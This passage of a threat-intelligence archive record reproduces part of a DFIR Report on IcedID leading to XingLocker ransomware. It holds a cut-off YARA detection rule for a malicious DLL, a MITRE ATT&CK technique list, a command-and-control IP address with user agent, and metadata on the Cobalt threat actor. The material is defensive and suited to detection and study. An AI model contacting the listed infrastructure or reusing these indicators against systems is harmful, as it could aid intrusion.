{\r\n meta:\r\n description = \"xinglocker - file update64.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-10-07\"\r\n hash1 = \"47ff886d229a013d6e73d660a395f7b8e285342195680083eb96d64c052dd5f0\"\r\n strings:\r\n $s1 = \"\u003ej=nAy;j;l;l;m;n;k;p;q;rFpFo;u;vBo;x;y\u003cj\u003ck\u003cl\u003cm\u003cn@o\u003cp\u003cq\u003cr\u003cs\u003ct\u003cu\u003cv\u003cw\u003cx\u003cy=j=k=l=m=n=o=p=q=r=s=t=u=v=w=x=y\u003ej\u003ek\u003el\u003e\r\n $s2 = \"?lAu\u003ewGmCkCl;p?nFkCyGy;mCl\u003eoDx9sGxCxCyHr\u003ct?oHu\u003cy@r=sClCkHvDtDuHn\u003cp@m=jFoHkAqEmEnAw=wEvAo=l9v@kEyEwExEy\u003es\u003elBtF\r\n $s3 = \"HnGtDyEpExFjAmEoAoFkEyEkEoEyAqAvErFpExFwFrFvFpFjBoEyFrEwEuBtFyFwEsFyBmGjCoCwDnCtCsCsCpCvCvCxGuDyCrCjDvDsCoDuC\r\n $s4 = \"Bw@oBrGr;vDqBoEpCoCp\u003eqGvCrBq?s\u003eoCwCxGm\u003cu@pHm\u003cr@u\u003ewCoAuDrDsAs@u\u003eoFtDyDyEj=l?qEyEpEoEpEq\u003cy=yElEuExEwExEuFjFkCqE\r\n $s5 = \"BwBx;pCmCkClCm=vAkCnCqCr;l?vGm;w?sFpCwDjDkGwGwGyGr@o@u@nHsGsHm\u003cy\u003ekGxHq=u:rAt=xFk\u003csBkEqEr@jEsEuEvEw;p\u003coFkFkFlG\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 23 of 24\n\n$s6 = \"Bo\u003ewGl9j9qGlGmGnBkEmFn\u003ctCk?k;jCr?jCvGx9yGnEwDkHnHoDt@vHw;s:vHuHvDo@o\u003cn=rAt:qDwGl9o9pGy\u003ckFlHoHn=nApFs=qBuFtHt9\r\n $s7 = \":oFoFlFj?k?l?m;vGx@qBr\u003ct@sAk?k;nGpGuFy@j@k@l\u003ctHw@lHwDn\u003cnHnGp\u003eyHv@v@x@yEs9tFsEmEw9xHoEyEk9l?sEtFmEvFjExEvExEy\u003e\r\n $s8 = \"FpDxFq?k=kCnGy;sCj:w\u003et\u003eq\u003epGpCr?nGk;qFuBnBsAk?kHj\u003cvElBmBrAt@m=nCsAkHkDyEjAs=uAn\u003cnAw=m9qDvCk\u003co9wAn=x9sAy\u003em;yFjC\r\n $s9 = \"FwFxBqEu;p\u003eu:v:u:t:sCyFm;rBw\u003cr?yBpExGyAo;w=tHlHnHoHpDy@mCoFxEuDn@x\u003ctFy\u003eyElExEyEr=wAy\u003eu;v9k\u003ew=mAyGk;x=pBuGs\u003etB\r\n $s10 = \":w:x\u003eqCoFx;wCqGr;o;p;q?jClHo?mFu?x@xFnEyExEw=q=l@k9y=n\u003cv=y=t@m9o=x?x=u;t9w@u\u003cj9n\u003ck;l;k9v@j\u003cs@m\u003cr:j9tEq;n@o;l\r\n $s11 = \"HoHuHkAjFkFjEpFqFpApAoGvEpFwEoEjElEyEuBjGoFwEkBnHqEnFrEyEtFyEsBvHyEuFkCnCwCqGkGrGoCyCsDuDwCuCqCjGwCyCkDnHkCj\r\n $s12 = \"EsHv:y;j;k;l;m;nEyEn;q;r;s;t;u;vFmEv;y\u003cj\u003ck\u003cl\u003cm\u003cn?qFn\u003cq\u003cr\u003cs\u003ct\u003cu\u003cv=yFy\u003cy=j=k=l=m=nEwCq=q=r=s=t=u=vFqCy=y\u003ej\u003ek\u003el\r\n $s13 = \"ByBwByCkCqCoCqCkCyCwCyCkCqCoCqCkCxCxCxDlDpDpDpDlDxDxDxDlDpDpDpDlDyDxDyEjEkElEmEnEoEpEqErEsEtEuEvEyExEyFjFkFl\r\n $s14 = \"GoHuByCjCkClCmCnErFyFnFsEoExApElFsAjEtErFnDlDmDnFrEyEnEsFoFxBpFmEwEtBkCoDsCqEmEnCkCnClCpCxHyHuGlCrDpCtFjFkFl\r\n $s15 = \"CqBxBpCjAnClFjCnCrCpCwCrCsCtCuCvGxCxGlDjHoDlHyDnHvDpHsDrHvDtAkDvDnDxBtEjDlElExEnEyEpEqErEsEtEuEvBkExApFjAkFl\r\n $s16 = \"\u003ep:yGp?l?k?l?m;k\u003epCp\u003enDtBp@yBw;u?w?xGtDj9o=r\u003cuHy@x\u003ctHtHn\u003ewHt@t@v@w\u003cpHvGnCoClAmEv9rFlCmDrEr\u003clDlAwAwAx@jAoBsFu\r\n $s17 = \";oGs;k\u003cyDuAw@xAjCmGx\u003ej=uCpHk\u003enGnAp@nGq?k\u003etHtDj?xHw@q\u003evDk\u003cv?kEyDq\u003cp@w=vArExGr9m\u003cqEtBr\u003cyAj=lEy?o@jEwExAq\u003eo:kCp\r\n $s18 = \";k\u003ct\u003ey?j;wGy;j?oFy?x?q?r?s;lGjCnBl@u:w:n@k@l\u003cuHyCw\u003cxHlDr@pHxFm@v@w@x\u003cq9uEwCpDuEr9rEtCmDvEo9k=uEn9jFtCuCj?xAq\r\n $s19 = \"HwByAjCkDyCmDyDuDr;o;u;nCk?mDqErGoCp?pAvFoGlCpDv@r\u003etFmHr9o9o9nDn@v:lHy9o9k9l=uAs\u003ejGpDx9v9r9t9uHm:rDo;k:j:kBs\r\n $s20 = \"AwBp\u003ev;nCkDw;j;rCw?yDuEvGkCl?lAjEsHxCq@sAoFpGuCmDnCjDpCyDk@s:qDvDo@wEl\u003cr\u003co9l9m9n=wAwHx@w9n=lAp9k;k\u003ct9y:jGx9q\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 500KB and\r\n ( pe.imphash() == \"309f189ae3d618bfd1e08a8538aea73a\" and ( pe.exports(\"MkozycymwrxdxsUdddknsoskqjj\") and pe.exports(\r\n}\r\nMITRE\r\nOS Credential Dumping – T1003\r\nSMB/Windows Admin Shares – T1021.002\r\nSystem Owner/User Discovery – T1033\r\nNetwork Service Scanning – T1046\r\nWindows Management Instrumentation – T1047\r\nScheduled Task/Job – T1053\r\nProcess Injection – T1055\r\nPowerShell – T1059.001\r\nDomain Groups – T1069.002\r\nFile and Directory Discovery – T1083\r\nAccess Token Manipulation – T1134\r\nNetwork Share Discovery – T1135\r\nDomain Trust Discovery – T1482\r\nData Encrypted for Impact – T1486\r\nSecurity Software Discovery – T1518.001\r\nDisable or Modify Tools – T1562.001\r\nSource: https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 24 of 24\n\n134.195.90.185:80 HTTP User Agent:   \nMozilla/5.0 (Windows NT 6.2; WOW64; Trident/5.0; rv:11.0) like Gecko 20210505604\n  Page 15 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/"
	],
	"report_names": [
		"icedid-to-xinglocker-ransomware-in-24-hours"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434481,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c516fb58cb70db768fb119f3823c4b83909ac0a.pdf",
		"text": "https://archive.orkl.eu/9c516fb58cb70db768fb119f3823c4b83909ac0a.txt",
		"img": "https://archive.orkl.eu/9c516fb58cb70db768fb119f3823c4b83909ac0a.jpg"
	}
}